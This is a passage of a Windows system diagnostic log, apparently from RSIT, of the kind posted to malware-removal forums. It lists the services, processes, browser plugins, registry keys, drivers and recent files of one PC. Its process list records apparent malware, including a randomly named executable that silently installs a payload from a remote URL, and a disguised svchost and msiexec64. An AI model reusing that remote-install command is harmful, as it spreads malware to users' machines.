O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\Windows\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\Windows\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\Windows\system32\sppsvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\Windows\system32\UI0Detect.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\Windows\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\Windows\System32\vds.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\Windows\system32\vssvc.exe (file missing)
O23 - Service: @%SystemRoot%\system32\Wat\WatUX.exe,-601 (WatAdminSvc) - Unknown owner - C:\Windows\system32\Wat\WatAdminSvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\Windows\system32\wbengine.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\Windows\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
--
End of file - 5910 bytes
======Listing Processes======
\SystemRoot\System32\smss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
wininit.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsm.exe
winlogon.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\system32\atiesrxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
atieclxx
C:\Windows\system32\svchost.exe -k NetworkService
"C:\Program Files\AVAST Software\Avast\AvastSvc.exe"
"C:\Windows\system32\Dwm.exe"
C:\Windows\Explorer.EXE
"taskhost.exe"
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
"C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
C:\Windows\System32\svchost.exe -k utcsvc
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler.exe"
"C:\Program Files (x86)\AVAST Software\Browser\Update\1.4.141.333\AvastBrowserCrashHandler64.exe"
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
taskeng.exe {9F7464FB-F858-4C01-B903-B02E4632587B}
C:\Windows\SysWOW64\EhYeIeLWi.exe /q /i http://soundal.info/v9b320qcn586.xue
C:\Windows\system32\msiexec.exe /V
C:\Windows\system32\SearchIndexer.exe /Embedding
AvastUI.exe /nogui
"C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
"C:\Program Files\Windows Media Player\wmpnetwk.exe"
C:\Windows\syswow64\MsiExec.exe -Embedding D9DC1851A781B7F5533C7DD50E245F0E
"C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM" PriorityLow
"C:\Users\Drone\AppData\Local\Media Network Sharing\msiexec64.exe"
\??\C:\Windows\system32\conhost.exe "-19937277911490919693-933249300-908891384-1566048741-249081015458105671364535199
\??\C:\Windows\system32\conhost.exe "171234901509696851-1045070504-55454072-1365905644312556696407872644-2096392339
"C:\Windows\SysWOW64\resources.bin" "-n" "msiexec64.exe"
C:\Windows\system32\wbem\unsecapp.exe -Embedding
"C:\Windows\SysWOW64\svchost.exe"
"C:\Windows\SysWOW64\svchost.exe" --config="C:\Users\Drone\AppData\Local\Temp\[495E8E]"
\??\C:\Windows\system32\conhost.exe "-91096917611275100337083751712060422261810659854-2085465575-1573627024258217638
"C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe" 0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Drone\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Drone\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Drone\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x88,0x8c,0x90,0x84,0x94,0x7fee87c24d0,0x7fee87c24e0,0x7fee87c24f0
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=4092 --on-initialized-event-handle=348 --parent-handle=352 /prefetch:6
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=D9CF77074821AC598E5B376AE36B11EB --mojo-platform-channel-handle=1108 --ignored=" --type=renderer " /prefetch:2
"C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe"
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=93FB6E71E51720C4AFEF2E896CE3333A --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=93FB6E71E51720C4AFEF2E896CE3333A --renderer-client-id=3 --mojo-platform-channel-handle=2160 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E7BF32E2BCC4F6399669CCB8E54A04CC --lang=cs --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E7BF32E2BCC4F6399669CCB8E54A04CC --renderer-client-id=4 --mojo-platform-channel-handle=2592 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=960523435D3F887DE832A4404842A18B --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=960523435D3F887DE832A4404842A18B --renderer-client-id=14 --mojo-platform-channel-handle=3420 /prefetch:1
C:\Windows\system32\CompatTelRunner.exe
\??\C:\Windows\system32\conhost.exe "1512110160697033495-800213516-119467602-1064192088154836462811149822782145537507
C:\Windows\system32\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:PxDcTOQ9t0aEou5p.1
taskeng.exe {7912F5E3-0345-4546-8687-238EFA0866D6}
C:\Windows\system32\wbem\wmiprvse.exe
taskeng.exe {C5AD0D9E-7183-4887-A14D-6F6A8D5A8D06}
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=C9E947F72D9B35D51EF245BAC507C30B --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=C9E947F72D9B35D51EF245BAC507C30B --renderer-client-id=35 --mojo-platform-channel-handle=4220 /prefetch:1
C:\Windows\system32\wbem\wmiprvse.exe
"C:\Windows\system32\SearchFilterHost.exe" 0 512 516 524 65536 520
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E1A56BA9015DD51AE87C7EB2DE2A1EEC --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E1A56BA9015DD51AE87C7EB2DE2A1EEC --renderer-client-id=36 --mojo-platform-channel-handle=4004 /prefetch:1
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1084,11518569677978599334,17729170141947783878,131072 --service-pipe-token=E8075E17D62A768FD9A6E2B5DC1ABF7D --lang=cs --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=1 --service-request-channel-token=E8075E17D62A768FD9A6E2B5DC1ABF7D --renderer-client-id=38 --mojo-platform-channel-handle=4060 /prefetch:1
"C:\Users\Drone\Downloads\RSITx64 (1).exe"
=========Mozilla firefox=========
ProfilePath - C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283
prefs.js - "browser.search.useDBForOrder" - true
"support@vdownloader.com"=C:\Program Files\VDownloader\Addons\FireFox
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@google.com/npPicasa3,version=3.0.0]
"Description"=Picasa3 plugin
"Path"=C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=3]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@tools.google.com/Google Update;version=9]
"Description"=Google Update
"Path"=C:\Program Files (x86)\Google\Update\1.3.33.17\npGoogleUpdate3.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.6]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=2.2.8]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\@videolan.org/vlc,version=3.0.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\MozillaPlugins\Adobe Reader]
"Description"=Handles PDFs in-place in Firefox
"Path"=C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@adobe.com/FlashPlayer]
"Description"=Adobe® Flash® Player 30.0.0.154 Plugin
"Path"=C:\Windows\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/DTPlugin,version=11.172.2]
"Description"=Java™ Deployment Toolkit
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\dtplugin\npDeployJava1.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@java.com/JavaPlugin,version=11.172.2]
"Description"=Oracle® Next Generation Java™ Plug-In
"Path"=C:\Program Files\Java\jre1.8.0_172\bin\plugin2\npjp2.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@microsoft.com/GENUINE]
"Description"=
"Path"=disabled
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.1.5]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.0]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.2]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.3]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.4]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
[HKEY_LOCAL_MACHINE\SOFTWARE\MozillaPlugins\@videolan.org/vlc,version=2.2.5.1]
"Description"=VLC Multimedia Plugin
"Path"=C:\Program Files\VideoLAN\VLC\npvlc.dll
C:\Program Files (x86)\Mozilla Firefox\plugins\
nppdf32.dll
C:\Users\Drone\AppData\Roaming\Mozilla\Firefox\Profiles\3gv1swpa.default-1479997392283\extensions\
cs@dictionaries.addons.mozilla.org
======Registry dump======
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{761497BB-D6F0-462C-B6EB-D4DAF1D92D43}]
Java(tm) Plug-In SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\ssv.dll [2018-04-25 582088]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2018-05-24 958328]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
Java(tm) Plug-In 2 SSV Helper - C:\Program Files\Java\jre1.8.0_172\bin\jp2ssv.dll [2018-04-25 245192]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{7b523e7c-f096-4e36-a0cb-7efeb5c675c1}]
IEExtension.VDownloaderBHO - C:\Windows\system32\mscoree.dll [2010-11-21 444752]
[HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{8E5E2654-AD2D-48bf-AC2D-D17F00898D06}]
avast! Online Security - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2018-05-24 820672]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AvastUI.exe"=C:\Program Files\AVAST Software\Avast\AvLaunch.exe [2018-05-24 242904]
[HKEY_LOCAL_MACHINE\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"=C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [2013-10-08 766208]
"SunJavaUpdateSched"=C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2018-03-28 588704]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\securityproviders]
"SecurityProviders"=credssp.dll
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\prwntdrv]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\AFD]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\network\prwntdrv]
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=5
"ConsentPromptBehaviorUser"=3
"EnableUIADesktopToggle"=0
"dontdisplaylastusername"=0
"legalnoticecaption"=
"legalnoticetext"=
"shutdownwithoutlogon"=1
"undockwithoutlogon"=1
"SoftwareSASGeneration"=1
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoSimpleNetIDList"=1
"NoDriveTypeAutoRun"=221
"NoDrives"=0
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\explorer]
"NoDrives"=0
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\standardprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\system\currentcontrolset\services\sharedaccess\parameters\firewallpolicy\domainprofile\authorizedapplications\list]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Drivers32]
"vidc.mrle"=msrle32.dll
"vidc.msvc"=msvidc32.dll
"msacm.imaadpcm"=imaadp32.acm
"msacm.msg711"=msg711.acm
"msacm.msgsm610"=msgsm32.acm
"msacm.msadpcm"=msadp32.acm
"midimapper"=midimap.dll
"wavemapper"=msacm32.drv
"vidc.uyvy"=msyuv.dll
"vidc.yuy2"=msyuv.dll
"vidc.yvyu"=msyuv.dll
"vidc.iyuv"=iyuv_32.dll
"vidc.i420"=iyuv_32.dll
"vidc.yvu9"=tsbyuv.dll
"msacm.l3acm"=C:\Windows\System32\l3codeca.acm
"wave"=wdmaud.drv
"midi"=wdmaud.drv
"mixer"=wdmaud.drv
"aux"=wdmaud.drv
"vidc.mjpg"=bdmjpeg64.dll
"vidc.mpeg"=bdmpegv64.dll
"msacm.bdmpeg"=bdmpega64.acm
"VIDC.FPS1"=frapsv64.dll
"wave1"=wdmaud.drv
"midi1"=wdmaud.drv
"mixer1"=wdmaud.drv
"aux1"=wdmaud.drv
======File associations======
.js - edit - C:\Windows\System32\Notepad.exe %1
======List of files/folders created in the last 1 month======
2018-09-04 20:51:41 ----A---- C:\Windows\ntbtlog.txt
2018-09-04 20:33:45 ----D---- C:\AdwCleaner
2018-09-04 17:05:14 ----D---- C:\rsit
2018-09-03 14:19:18 ----D---- C:\Windows\{EB47D3E9-14CE-4BE0-B16B-C061571F46C7}
2018-09-02 16:15:31 ----D---- C:\9df5ec6646e5f65a782b5ad04331
2018-09-02 11:10:32 ----D---- C:\Windows\{D32F0790-E651-41F4-9571-6065DA044B85}
2018-09-01 20:53:51 ----D---- C:\Program Files\VS Revo Group
2018-09-01 20:28:40 ----N---- C:\Windows\SYSWOW64\mfc71.dll
2018-08-29 15:10:58 ----D---- C:\Windows\{B58AFBDA-7D5B-40C0-BE79-D9F3286E2165}
2018-08-25 09:52:05 ----D---- C:\Windows\{2E03268B-4782-44EF-B29B-44B65D240959}
2018-08-22 18:51:23 ----D---- C:\Windows\{386B5B3F-9B0C-4C98-A35A-9D30F4B40497}
2018-08-14 21:52:56 ----D---- C:\Windows\{C0DBEF00-2BEB-4F04-B2D3-8007390D5C0B}
2018-08-10 14:47:32 ----D---- C:\Windows\{6CD4963C-603E-45BC-A07A-EB9A6137CC9A}
2018-08-07 13:48:33 ----D---- C:\Windows\{9313CB30-7832-4851-AF74-A21456C4EF2A}
======List of files/folders modified in the last 1 month======
2018-09-05 16:07:19 ----D---- C:\Program Files\trend micro
2018-09-05 16:07:11 ----D---- C:\Windows\Temp
2018-09-05 15:55:06 ----D---- C:\Windows\SysWOW64
2018-09-05 15:53:13 ----SHD---- C:\Windows\Installer
2018-09-05 15:52:57 ----SHD---- C:\Config.Msi
2018-09-04 20:51:41 ----D---- C:\Windows
2018-09-04 16:26:00 ----D---- C:\Users\Drone\AppData\Roaming\MPC-HC
2018-09-04 14:00:23 ----D---- C:\Windows\system32\LogFiles
2018-09-04 13:57:19 ----D---- C:\Windows\Prefetch
2018-09-03 22:07:02 ----D---- C:\Users\Drone\AppData\Roaming\PhotoScape
2018-09-03 20:28:28 ----D---- C:\Windows\rescache
2018-09-03 17:08:24 ----D---- C:\Windows\SYSWOW64\Macromed
2018-09-02 20:42:57 ----D---- C:\Windows\inf
2018-09-02 20:42:54 ----D---- C:\Windows\Minidump
2018-09-02 19:39:45 ----D---- C:\Windows\system32\config
2018-09-02 19:38:34 ----D---- C:\Windows\winsxs
2018-09-02 19:32:55 ----D---- C:\Windows\system32\catroot2
2018-09-02 19:09:26 ----D---- C:\Windows\System32
2018-09-02 19:09:26 ----A---- C:\Windows\system32\PerfStringBackup.INI
2018-09-02 19:01:32 ----D---- C:\Windows\SYSWOW64\cs-CZ
2018-09-02 19:01:32 ----D---- C:\Program Files\Internet Explorer
2018-09-02 19:01:31 ----D---- C:\Windows\SYSWOW64\en-US
2018-09-02 19:01:30 ----D---- C:\Windows\system32\drivers
2018-09-02 19:01:30 ----D---- C:\Windows\system32\cs-CZ
2018-09-02 19:01:29 ----D---- C:\Windows\system32\en-US
2018-09-02 19:01:27 ----D---- C:\Windows\AppPatch
2018-09-02 19:01:27 ----D---- C:\Program Files (x86)\Internet Explorer
2018-09-02 19:01:26 ----D---- C:\Windows\system32\Boot
2018-09-02 19:01:22 ----D---- C:\Windows\system32\DriverStore
2018-09-02 18:25:57 ----D---- C:\Windows\system32\CodeIntegrity
2018-09-01 21:44:27 ----RD---- C:\Program Files (x86)
2018-09-01 21:02:13 ----D---- C:\Users\Drone\AppData\Roaming\uTorrent
2018-09-01 21:02:12 ----D---- C:\Users\Drone\AppData\Roaming\Seznam.cz
2018-09-01 20:53:51 ----D---- C:\Program Files
2018-08-28 15:08:59 ----SD---- C:\ProgramData\Microsoft
2018-08-26 15:08:15 ----D---- C:\Users\Drone\AppData\Roaming\vlc
2018-08-23 14:22:53 ----D---- C:\Windows\system32\Tasks
2018-08-14 21:51:03 ----A---- C:\Windows\SYSWOW64\FlashPlayerApp.exe
2018-08-14 21:50:54 ----D---- C:\Windows\system32\Macromed
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Maintenance Service
2018-08-12 12:03:29 ----D---- C:\Program Files (x86)\Mozilla Firefox
2018-08-11 14:57:07 ----D---- C:\Program Files (x86)\Common Files
2018-08-10 21:58:02 ----RSD---- C:\Windows\assembly
2018-08-06 22:57:04 ----D---- C:\Windows\{7CB0BBD3D374-4DEA-9751-2D08BC721AA7}
======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R0 aswbidsh;aswbidsh; C:\Windows\system32\drivers\aswbidsha.sys [2018-05-24 199440]
R0 aswblog;aswblog; C:\Windows\system32\drivers\aswbloga.sys [2018-05-24 343752]
R0 aswbuniv;aswbuniv; C:\Windows\system32\drivers\aswbuniva.sys [2018-05-24 57680]
R0 aswRvrt;aswRvrt; C:\Windows\system32\drivers\aswRvrt.sys [2018-05-24 85968]
R0 aswVmm;aswVmm; C:\Windows\system32\drivers\aswVmm.sys [2018-05-24 381552]
R0 rdyboost;ReadyBoost; C:\Windows\System32\drivers\rdyboost.sys [2018-01-01 213736]
R1 aswArPot;aswArPot; C:\Windows\system32\drivers\aswArPot.sys [2018-05-24 196640]
R1 aswbidsdriver;aswbidsdriver; C:\Windows\system32\drivers\aswbidsdrivera.sys [2018-05-24 227504]
R1 aswHdsKe;aswHdsKe; C:\Windows\system32\drivers\aswHdsKe.sys [2018-05-24 234560]
R1 aswRdr;aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [2018-05-24 111360]
R1 aswSnx;aswSnx; C:\Windows\system32\drivers\aswSnx.sys [2018-05-24 1027720]
R1 aswSP;aswSP; C:\Windows\system32\drivers\aswSP.sys [2018-05-24 460520]
R1 CSC;@%systemroot%\system32\cscsvc.dll,-202; C:\Windows\system32\drivers\csc.sys [2012-01-12 514560]
R2 aswMonFlt;aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [2018-05-24 159120]
R2 aswStm;aswStm; C:\Windows\system32\drivers\aswStm.sys [2018-05-24 205976]
R2 npf;NetGroup Packet Filter Driver; C:\Windows\system32\drivers\npf.sys [2011-02-11 35344]
R3 amdkmdag;amdkmdag; C:\Windows\system32\DRIVERS\atikmdag.sys [2013-10-08 12534784]
R3 amdkmdap;amdkmdap; C:\Windows\system32\DRIVERS\atikmpag.sys [2013-10-08 619008]
R3 AtiHDAudioService;AMD Function Driver for HD Audio Service; C:\Windows\system32\drivers\AtihdW76.sys [2016-04-01 104976]
R3 RTL8167;Realtek 8167 NT Driver; C:\Windows\system32\DRIVERS\Rt64win7.sys [2009-03-01 187392]
S3 aswHwid;aswHwid; C:\Windows\system32\drivers\aswHwid.sys [2018-05-24 46968]
S3 BridgeMP;@%SystemRoot%\system32\bridgeres.dll,-1; C:\Windows\system32\DRIVERS\bridge.sys [2012-01-12 95232]
S3 dmvsc;dmvsc; C:\Windows\system32\drivers\dmvsc.sys [2010-11-21 71168]
S3 pciide;pciide; C:\Windows\system32\drivers\pciide.sys [2009-07-14 12352]
S3 prwntdrv;prwntdrv; \??\C:\Windows\syswow64\prwntdrv.sys [2014-10-23 15456]
S3 RDPDR;Terminal Server Device Redirector Driver; C:\Windows\System32\drivers\rdpdr.sys [2012-01-12 165888]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver; C:\Windows\System32\drivers\rdpvideominiport.sys [2012-08-23 19456]
S3 s3cap;s3cap; C:\Windows\system32\drivers\vms3cap.sys [2010-11-21 6656]
S3 storvsc;storvsc; C:\Windows\system32\drivers\storvsc.sys [2010-11-21 34688]
S3 TsUsbFlt;TsUsbFlt; C:\Windows\system32\drivers\tsusbflt.sys [2013-10-02 56832]
S3 TsUsbGD;Remote Desktop Generic USB Device; C:\Windows\system32\drivers\TsUsbGD.sys [2012-08-23 30208]
S3 vmbus;vmbus; C:\Windows\system32\drivers\vmbus.sys [2010-11-21 199552]
S3 VMBusHID;VMBusHID; C:\Windows\system32\drivers\VMBusHID.sys [2010-11-21 21760]
======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======
R2 AdobeARMservice;Adobe Acrobat Update Service; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [2018-03-21 83984]
R2 AMD External Events Utility;AMD External Events Utility; C:\Windows\system32\atiesrxx.exe [2013-10-08 239616]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2018-05-24 317280]
R2 CscService;@%systemroot%\system32\cscsvc.dll,-200; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R2 DiagTrack;@%SystemRoot%\system32\UtcResources.dll,-3001; C:\Windows\System32\svchost.exe [2012-01-12 27648]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\x64\aswidsagenta.exe [2018-05-24 7620096]
S2 avast;Služba %1!s! Update (avast); C:\Program Files (x86)\AVAST Software\Browser\Update\AvastBrowserUpdate.exe [2018-06-13 164984]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86; C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2017-04-21 107656]
